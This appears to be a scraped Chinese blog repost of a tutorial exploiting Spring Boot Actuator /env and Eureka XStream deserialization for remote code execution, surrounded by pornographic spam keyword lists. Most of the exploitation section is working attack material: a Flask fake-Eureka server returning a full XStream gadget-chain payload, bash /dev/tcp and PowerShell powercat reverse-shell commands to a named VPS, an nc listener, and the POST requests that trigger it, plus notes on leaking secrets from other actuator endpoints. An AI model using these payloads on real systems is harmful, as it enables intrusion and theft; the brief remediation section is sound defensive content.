日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 前端技术 > javascript >内容正文

javascript

【web安全】Spring Boot eureka xstream 反序列化

發布時間:2025/3/21 javascript 32 豆豆
生活随笔 收集整理的這篇文章主要介紹了 【web安全】Spring Boot eureka xstream 反序列化 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

一、漏洞概述

Eureka 是 Spring Cloud Netflix 模塊的子模塊,它是 Spring Cloud 對 Netflix Eureka 的二次封裝,主要負責 Spring Cloud 的服務注冊與發現功能,開發人員只需引入相關依賴和注解輕松將 Spring Boot 與 Eureka 進行整合。

安全人員(Michael Stepankin)發現,服務注冊與發現功能可能被濫用,當 eureka.client.serviceUrl.defaultZone 屬性被設置為惡意的外部 eureka server URL地址并/refresh 觸發目標機器請求遠程 URL,提前架設的 fake eureka server 就會返回惡意的 payload。目標機器解析 payload,觸發 XStream 反序列化,造成 RCE 漏洞。

二、利用條件

1.目標可出網

2.目標使用的 eureka-client < 1.8.7(存在 spring-cloud-starter-netflix-eureka-client 依賴)

3.可用 POST 方式請求目標網站的 /env 接口,并設置zone屬性

4.可用 POST 方式請求目標網站的 /refresh 接口刷新配置(存在 spring-boot-starter-actuator 依賴)

三、漏洞環境

Web服務器:Windows Server 2012, JDK8u131 (1.13.190.222)

VPS: Ubuntu 16.04.7 LTS (162.14.73.205)

四、正常訪問

訪問URL: http://1.13.190.222:64000/env , 得到一些json格式的敏感數據。

五、漏洞利用

【私信回復“資料”獲取】
1、網絡安全學習路線
2、電子書籍(白帽子)
3、安全大廠內部視頻
4、100份src文檔
5、常見安全面試題
6、ctf大賽經典題目解析
7、全套工具包
8、應急響應筆記

提前在VPS服務器準備相關文件和監聽服務,利用VPS python起的fake server 串聯調用執行代碼。

Web服務器:Windows Server 2012, JDK8u131(1.13.190.222)

VPS: Ubuntu 16 (162.14.73.205)

步驟一:架設腳本

響應惡意 XStream payload 的 python 腳本示例(依賴Flask),腳本還需要配合彈shell命令。

對于Linux,可以利用目標機器上自帶的 python 來反彈shell。

對于Windows,可以利用 powercat.ps1 來反彈shell。

啟動腳本 python3 eureka-rce.py

Flask Server 8883

步驟二:NC監聽

File Server 8000

對于windows平臺彈 shell,用python3 -m http.server 8000,快速搭建powercat.ps1 文件下載服務。

使用 nc 監聽端口,等待反彈 shell

nc -lvp 8885

步驟三:設置defaultZone

設置 eureka.client.serviceUrl.defaultZone 屬性

版本1:spring 1.x

POST /env Content-Type: application/x-www-form-urlencodedeureka.client.serviceUrl.defaultZone=http://162.14.73.205:8883/

版本2:spring 2.x

POST /actuator/env Content-Type: application/json{"name":"eureka.client.serviceUrl.defaultZone","value":"http://162.14.73.205:8883"}

返回200,body內容為{"eureka.client.serviceUrl.defaultZone":"http://162.14.73.205:8883/"},即設置成功。

步驟四:刷新配置

版本1:spring 1.x

版本2:spring 2.x

返回200,body [] 為刷新成功。

接到Shell

六、漏洞修復

可考慮禁用/env接口(endpoints.env.enabled= false),但需要不影響業務/運維。通常考慮對/env接口進行鑒權,通過在pom.xml文件下引入spring-boot-starter-security依賴,并在application.properties中開啟security功能,配置訪問賬號密碼,重啟應用。

pom.xml <dependency><groupId>org.springframework.boot</groupId><artifactId>spring-boot-starter-security</artifactId> </dependency>application.properties management.security.enabled=true security.user.name=administrator security.user.password=123456

附錄

1.python腳本

# -*- coding: utf-8 -*- # home.php?mod=space&uid=59738 : 2022-3-11 20點48分 # home.php?mod=space&uid=210785 : eureka-rce.py# linux反彈shell # <string>/bin/bash</string> # <string>-c</string> # <string>bash -i >& /dev/tcp/162.14.73.205/8885 0>&1</string># windows反彈shell # <string>powershell</string> # <string>IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');</string># windows反彈shell # <string>cmd.exe</string> # <string>/c</string> # <string>ping %COMPUTERNAME%.6f9796ab.dns.bypass.eu.org</string># windows dnslog https://dig.pm/ # <string>cmd.exe</string> # <string>/c</string> # <string>ping 757013cd.dns.bypass.eu.org</string>from flask import Flask, Responseapp = Flask(__name__)@app.route('/', defaults={'path': ''}) @app.route('/<path:path>', methods = ['GET', 'POST']) def catch_all(path):xml = """<linked-hash-set><jdk.nashorn.internal.objects.NativeString><value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"><dataHandler><dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"><is class="javax.crypto.CipherInputStream"><cipher class="javax.crypto.NullCipher"><serviceIterator class="javax.imageio.spi.FilterIterator"><iter class="javax.imageio.spi.FilterIterator"><iter class="java.util.Collections$EmptyIterator"/><next class="java.lang.ProcessBuilder"><command> <string>powershell</string> <string>IEX (New-Object System.Net.Webclient).DownloadString('http://162.14.73.205:8000/powercat.ps1');powercat -c 162.14.73.205 -p 8885 -e cmd</string></command><redirectErrorStream>false</redirectErrorStream></next></iter><filter class="javax.imageio.ImageIO$ContainsFilter"><method><class>java.lang.ProcessBuilder</class><name>start</name><parameter-types/></method><name>foo</name></filter><next class="string">foo</next></serviceIterator><lock/></cipher><input class="java.lang.ProcessBuilder$NullInputStream"/><ibuffer></ibuffer></is></dataSource></dataHandler></value></jdk.nashorn.internal.objects.NativeString> </linked-hash-set>"""return Response(xml, mimetype='application/xml') if __name__ == "__main__":app.run(host='0.0.0.0', port=8883)

2.其他接口利用

/env : 獲取環境屬性,數據庫密碼等,如數據庫在外網并且未進行白名單限制,可拿數據庫權限。

/mappings: 獲取接口列表,如接口未鑒權,可進一步獲得敏感信息。

/dump: 獲得內存快照,配合VisualVM 可進一步獲得敏感信息。

/trace:獲取認證信息,類似druid/index.html泄露session等認證信息,可進一步利用權限突破。

總結

以上是生活随笔為你收集整理的【web安全】Spring Boot eureka xstream 反序列化的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

主站蜘蛛池模板: 国产精品5| 亚洲剧情av | 亚洲国产精品综合久久久 | 成人毛片100部免费看 | 人妻少妇一区二区 | 色偷偷亚洲 | 国产在线视频导航 | 91九色视频 | 美女福利一区 | 日本美女视频网站 | 影音先锋每日资源 | 久久久久久婷 | 露出调教羞耻91九色 | 少妇精品一区二区 | 青青草视频免费观看 | 91视频国产精品 | 精品成在人线av无码免费看 | 最新国产拍偷乱偷精品 | 免费看av大片 | 婷婷激情网站 | 婷婷亚洲五月 | 美女扒开腿让人桶爽 | 国产精品乱码一区二区三区 | www亚洲色图 | 欧美aa在线 | 激情视频91| 九九精品视频免费 | 女同亚洲精品一区二区三 | 夜夜骚视频 | 狠狠操一区二区 | 精品视频一区二区三区四区五区 | 国产最新毛片 | 老司机免费视频 | 91免费精品视频 | 人妻少妇偷人精品久久性色 | 网址av | 伊人春色在线 | 精品97人妻无码中文永久在线 | 日本精品一区二区三区四区的功能 | 人人插插 | 中文字幕日韩精品亚洲一区小树林 | 波多野结衣激情视频 | 18黄暴禁片在线观看 | 久久午夜夜伦鲁鲁片 | 99热这里只有精品66 | 公侵犯人妻中文字慕一区二区 | 污视频网站在线观看 | 影音先锋国产 | 特黄视频在线观看 | 欧美日韩综合 | 中文字幕一区二区三区乱码在线 | 亚洲精品免费观看 | 69欧美视频| 欧美视频 | 久久99国产精品视频 | 成人看片网| xxxx69国产| 亚洲热在线视频 | 国产高清自拍一区 | 99在线无码精品入口 | 中文字幕在线资源 | 欧美大奶在线 | 特级西西444www大精品视频 | 久久久综合视频 | 日本一本久草 | 少妇高潮一区二区三区喷水 | 日韩一区二区三区精品视频 | 调教亲女小嫩苞h文小说 | 黑人玩弄人妻一区二区三区 | 动漫大乳美女 | 成人亚洲天堂 | 99精品热视频 | 逼特逼视频在线观看 | 亚洲永久无码7777kkk | 黄色片网站免费观看 | 欧美日韩免费一区 | 超碰凹凸| 亚洲欧美色图 | 懂色中文一区二区在线播放 | 色七七桃花综合影院 | 精品国产一区在线 | 992在线观看| 亚洲影院中文字幕 | 欧美第一网站 | 国产精品自拍视频一区 | 欧美11p| 精品成在人线av无码免费看 | 丝袜一区二区三区四区 | 精品少妇人妻av一区二区三区 | 五月婷婷俺也去 | 久久久啊啊啊 | 亚洲精品一二区 | 大学生高潮无套内谢视频 | 日韩天堂 | 性按摩玩人妻hd中文字幕 | 少妇精品久久久一区二区三区 | 久久国内精品 | 日韩精品人妻无码一本 | 91成人在线免费 |